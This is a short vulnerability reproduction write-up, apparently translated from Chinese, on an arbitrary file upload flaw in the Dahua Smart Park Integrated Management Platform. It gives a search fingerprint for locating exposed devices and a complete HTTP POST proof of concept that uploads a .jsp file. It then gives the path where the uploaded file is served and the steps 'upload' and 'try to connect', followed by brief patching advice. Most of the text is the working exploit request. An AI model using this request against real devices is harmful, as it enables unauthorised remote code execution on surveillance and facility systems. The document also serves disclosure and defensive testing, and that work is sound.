0x01 Product Introduction
"Dahua Smart Park Integrated Management Platform" is a comprehensive management platform with functions such as park operation, resource allocation, and intelligent services. The platform is intended to assist in optimizing the resource allocation of the park to meet diversified management needs, and at the same time enhance the user experience by providing intelligent services.
0x02 Vulnerability Overview
The Dahua Smart Park device has opened the file upload function , but it has not strictly restricted and filtered the uploaded file type, size, format, path, etc., allowing attackers to construct malicious files and upload them to the device, and then use this The vulnerability gains privileges and executes arbitrary commands.
0x03 Recurrence environment
Intergraph fingerprint: web.body="/WPMS/asset/lib/gridster/"
0x04 Vulnerability Reappearance
PoC
POST /publishing/publishing/material/file/video HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="a.jsp"
test
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"
submit
--dd8f988919484abab3816881c55272a7--
verify url
http://your-ip/publishingImg/VIDEO/返回的文件名.jsp
upload
try to connect
0x05 Repair suggestion
It is recommended that users who use relevant systems apply patches as soon as possible, and at the same time restrict access sources, and try to avoid exposing the comprehensive management platform of Dahua Smart Park to the public network or insecure network environment.